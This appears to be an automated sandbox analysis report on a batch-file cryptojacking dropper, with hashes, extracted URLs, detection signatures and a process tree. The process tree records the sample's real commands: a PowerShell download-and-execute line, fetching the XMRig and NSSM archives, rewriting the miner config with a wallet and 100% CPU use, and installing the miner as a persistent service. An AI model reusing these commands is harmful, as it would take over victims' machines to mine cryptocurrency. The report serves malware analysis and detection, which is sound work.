Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-07-2024 03:32

General

  • Target

    248553108626019.bat

  • Size

    517B

  • MD5

    ac9d73455d58bfa42f81e718b8c8d6b5

  • SHA1

    60040fff333b7bc09b22e5c013f11b8a99555ed3

  • SHA256

    4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

  • SHA512

    ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://rentry.co/regele/raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

  • Stops running service(s) 4 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Using powershell.exe command.

  • Delays execution with timeout.exe 52 IoCs
  • Kills process with taskkill 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\248553108626019.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2240
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1420
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEB5A.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
        3⤵
          PID:1852
          • C:\Windows\system32\net.exe
            net session
            4⤵
              PID:3896
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 session
                5⤵
                  PID:4280
              • C:\Windows\system32\where.exe
                where powershell
                4⤵
                  PID:3084
                • C:\Windows\system32\where.exe
                  where find
                  4⤵
                    PID:4016
                  • C:\Windows\system32\where.exe
                    where findstr
                    4⤵
                      PID:4992
                    • C:\Windows\system32\where.exe
                      where tasklist
                      4⤵
                        PID:1656
                      • C:\Windows\system32\where.exe
                        where sc
                        4⤵
                          PID:4696
                        • C:\Windows\system32\sc.exe
                          sc stop moneroocean_miner
                          4⤵
                          • Launches sc.exe
                          PID:1944
                        • C:\Windows\system32\sc.exe
                          sc delete moneroocean_miner
                          4⤵
                          • Launches sc.exe
                          PID:1100
                        • C:\Windows\system32\taskkill.exe
                          taskkill /f /t /im xmrig.exe
                          4⤵
                          • Kills process with taskkill
                          PID:3132
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
                          4⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:2520
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
                          4⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:4776
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                          4⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:4620
                        • C:\Users\Admin\moneroocean\xmrig.exe
                          "C:\Users\Admin\moneroocean\xmrig.exe" --help
                          4⤵
                            PID:4516
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
                            4⤵
                              PID:4412
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
                                5⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:3420
                                • C:\Windows\system32\HOSTNAME.EXE
                                  "C:\Windows\system32\HOSTNAME.EXE"
                                  6⤵
                                    PID:1888
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:3288
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:1340
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Oailvcny\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:3356
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:2112
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:708
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:964
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:1232
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:4212
                              • C:\Windows\system32\sc.exe
                                sc stop moneroocean_miner
                                4⤵
                                • Launches sc.exe
                                PID:1132
                              • C:\Windows\system32\sc.exe
                                sc delete moneroocean_miner
                                4⤵
                                • Launches sc.exe
                                PID:5024
                              • C:\Users\Admin\moneroocean\nssm.exe
                                "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
                                4⤵
                                  PID:2836
                                • C:\Users\Admin\moneroocean\nssm.exe
                                  "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
                                  4⤵
                                    PID:2524
                                  • C:\Users\Admin\moneroocean\nssm.exe
                                    "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
                                    4⤵
                                      PID:416
                                    • C:\Users\Admin\moneroocean\nssm.exe
                                      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
                                      4⤵
                                        PID:1488
                                      • C:\Users\Admin\moneroocean\nssm.exe
                                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
                                        4⤵
                                          PID:60
                                        • C:\Users\Admin\moneroocean\nssm.exe
                                          "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
                                          4⤵
                                            PID:456
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                        2⤵
                                          PID:1196
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic cpu get loadpercentage
                                            3⤵
                                              PID:4500
                                          • C:\Windows\system32\timeout.exe
                                            timeout /t 1
                                            2⤵
                                            • Delays execution with timeout.exe
                                            PID:4884
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                            2⤵
                                              PID:440
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic cpu get loadpercentage
                                                3⤵
                                                  PID:2296
                                              • C:\Windows\system32\timeout.exe
                                                timeout /t 1
                                                2⤵
                                                • Delays execution with timeout.exe
                                                PID:2836
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                2⤵
                                                  PID:2908
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic cpu get loadpercentage
                                                    3⤵
                                                      PID:3212
                                                  • C:\Windows\system32\timeout.exe
                                                    timeout /t 1
                                                    2⤵
                                                    • Delays execution with timeout.exe
                                                    PID:1536
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                    2⤵
                                                      PID:4016
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic cpu get loadpercentage
                                                        3⤵
                                                          PID:4692
                                                      • C:\Windows\system32\timeout.exe
                                                        timeout /t 1
                                                        2⤵
                                                        • Delays execution with timeout.exe
                                                        PID:1624
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                        2⤵
                                                          PID:1852
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic cpu get loadpercentage
                                                            3⤵
                                                              PID:4088
                                                          • C:\Windows\system32\timeout.exe
                                                            timeout /t 1
                                                            2⤵
                                                            • Delays execution with timeout.exe
                                                            PID:4468
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                            2⤵
                                                              PID:1080
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic cpu get loadpercentage
                                                                3⤵
                                                                  PID:1420
                                                              • C:\Windows\system32\timeout.exe
                                                                timeout /t 1
                                                                2⤵
                                                                • Delays execution with timeout.exe
                                                                PID:1216
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                2⤵
                                                                  PID:1892
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic cpu get loadpercentage
                                                                    3⤵
                                                                      PID:1372
                                                                  • C:\Windows\system32\timeout.exe
                                                                    timeout /t 1
                                                                    2⤵
                                                                    • Delays execution with timeout.exe
                                                                    PID:5080
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                    2⤵
                                                                      PID:4676
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic cpu get loadpercentage
                                                                        3⤵
                                                                          PID:640
                                                                      • C:\Windows\system32\timeout.exe
                                                                        timeout /t 1
                                                                        2⤵
                                                                        • Delays execution with timeout.exe
                                                                        PID:3936
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                        2⤵
                                                                          PID:1172
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic cpu get loadpercentage
                                                                            3⤵
                                                                              PID:2044
                                                                          • C:\Windows\system32\timeout.exe
                                                                            timeout /t 1
                                                                            2⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:1556
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                            2⤵
                                                                              PID:1816
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic cpu get loadpercentage
                                                                                3⤵
                                                                                  PID:4760
                                                                              • C:\Windows\system32\timeout.exe
                                                                                timeout /t 1
                                                                                2⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:3300
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                2⤵
                                                                                  PID:4340
                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                    wmic cpu get loadpercentage
                                                                                    3⤵
                                                                                      PID:3732
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout /t 1
                                                                                    2⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:628
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                    2⤵
                                                                                      PID:440
                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                        wmic cpu get loadpercentage
                                                                                        3⤵
                                                                                          PID:1720
                                                                                      • C:\Windows\system32\timeout.exe
                                                                                        timeout /t 1
                                                                                        2⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:4648
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                        2⤵
                                                                                          PID:1804
                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                            wmic cpu get loadpercentage
                                                                                            3⤵
                                                                                              PID:3288
                                                                                          • C:\Windows\system32\timeout.exe
                                                                                            timeout /t 1
                                                                                            2⤵
                                                                                            • Delays execution with timeout.exe
                                                                                            PID:4900
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                            2⤵
                                                                                              PID:4208
                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                wmic cpu get loadpercentage
                                                                                                3⤵
                                                                                                  PID:832
                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                timeout /t 1
                                                                                                2⤵
                                                                                                • Delays execution with timeout.exe
                                                                                                PID:4692
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                2⤵
                                                                                                  PID:1624
                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                    wmic cpu get loadpercentage
                                                                                                    3⤵
                                                                                                      PID:2128
                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                    timeout /t 1
                                                                                                    2⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:3036
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                    2⤵
                                                                                                      PID:4960
                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                        wmic cpu get loadpercentage
                                                                                                        3⤵
                                                                                                          PID:2548
                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                        timeout /t 1
                                                                                                        2⤵
                                                                                                        • Delays execution with timeout.exe
                                                                                                        PID:3292
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                        2⤵
                                                                                                          PID:1420
                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                            wmic cpu get loadpercentage
                                                                                                            3⤵
                                                                                                              PID:1972
                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                            timeout /t 1
                                                                                                            2⤵
                                                                                                            • Delays execution with timeout.exe
                                                                                                            PID:4076
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                            2⤵
                                                                                                              PID:1980
                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                wmic cpu get loadpercentage
                                                                                                                3⤵
                                                                                                                  PID:552
                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                timeout /t 1
                                                                                                                2⤵
                                                                                                                • Delays execution with timeout.exe
                                                                                                                PID:3628
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                2⤵
                                                                                                                  PID:3604
                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                    wmic cpu get loadpercentage
                                                                                                                    3⤵
                                                                                                                      PID:4604
                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                    timeout /t 1
                                                                                                                    2⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:468
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                    2⤵
                                                                                                                      PID:2984
                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                        wmic cpu get loadpercentage
                                                                                                                        3⤵
                                                                                                                          PID:4064
                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                        timeout /t 1
                                                                                                                        2⤵
                                                                                                                        • Delays execution with timeout.exe
                                                                                                                        PID:3976
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                        2⤵
                                                                                                                          PID:1196
                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                            wmic cpu get loadpercentage
                                                                                                                            3⤵
                                                                                                                              PID:4760
                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                            timeout /t 1
                                                                                                                            2⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:4368
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                            2⤵
                                                                                                                              PID:712
                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                3⤵
                                                                                                                                  PID:1300
                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                timeout /t 1
                                                                                                                                2⤵
                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                PID:628
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                2⤵
                                                                                                                                  PID:3856
                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                    3⤵
                                                                                                                                      PID:1860
                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                    timeout /t 1
                                                                                                                                    2⤵
                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                    PID:4364
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                    2⤵
                                                                                                                                      PID:4420
                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                        3⤵
                                                                                                                                          PID:1088
                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                        timeout /t 1
                                                                                                                                        2⤵
                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                        PID:3896
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                        2⤵
                                                                                                                                          PID:832
                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                            3⤵
                                                                                                                                              PID:4016
                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                            timeout /t 1
                                                                                                                                            2⤵
                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                            PID:4264
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                            2⤵
                                                                                                                                              PID:1624
                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                3⤵
                                                                                                                                                  PID:1852
                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                timeout /t 1
                                                                                                                                                2⤵
                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                PID:2532
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                2⤵
                                                                                                                                                  PID:4960
                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3292
                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                    timeout /t 1
                                                                                                                                                    2⤵
                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                    PID:4156
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                    2⤵
                                                                                                                                                      PID:3200
                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                        3⤵
                                                                                                                                                          PID:2592
                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                        timeout /t 1
                                                                                                                                                        2⤵
                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                        PID:436
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                        2⤵
                                                                                                                                                          PID:4516
                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4196
                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                            timeout /t 1
                                                                                                                                                            2⤵
                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                            PID:3844
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                            2⤵
                                                                                                                                                              PID:2892
                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:2992
                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                timeout /t 1
                                                                                                                                                                2⤵
                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                PID:3536
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:3232
                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:1256
                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                    timeout /t 1
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                    PID:4092
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:2388
                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:3420
                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                        timeout /t 1
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                        PID:1196
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2644
                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:3732
                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                            timeout /t 1
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                            PID:216
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:4756
                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:1612
                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                PID:3600
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4364
                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:3112
                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                    PID:4172
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:4704
                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:4692
                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                        PID:1744
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4780
                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4108
                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                            PID:2548
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:2944
                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:1216
                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
